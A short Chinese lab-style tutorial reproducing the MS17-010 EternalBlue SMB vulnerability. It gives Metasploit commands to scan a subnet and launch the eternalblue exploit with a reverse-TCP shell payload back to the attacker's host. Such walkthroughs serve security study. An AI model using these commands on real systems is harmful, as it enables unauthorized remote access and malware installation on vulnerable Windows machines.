MS17-010永恒之蓝
漏洞描述:
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞影响:
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
漏洞复现过程:
1.nmap扫描发现可攻击的目标(445/139)
2.开启msfconsole
3.搜索ms17-010相关的模块
search ms17-010
4.三连
选择漏洞利用模块 use auxiliary/scanner/smb/smb_ms17_010
设置目标ip set rhosts 192.168.0.1/24
开始扫描 exploit
5.发现可以利用的ms17-010漏洞
6.设置被攻击主机与攻击主机IP,进行攻击
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set rhosts 被攻击主机ip
set lhost 攻击主机ip
exploit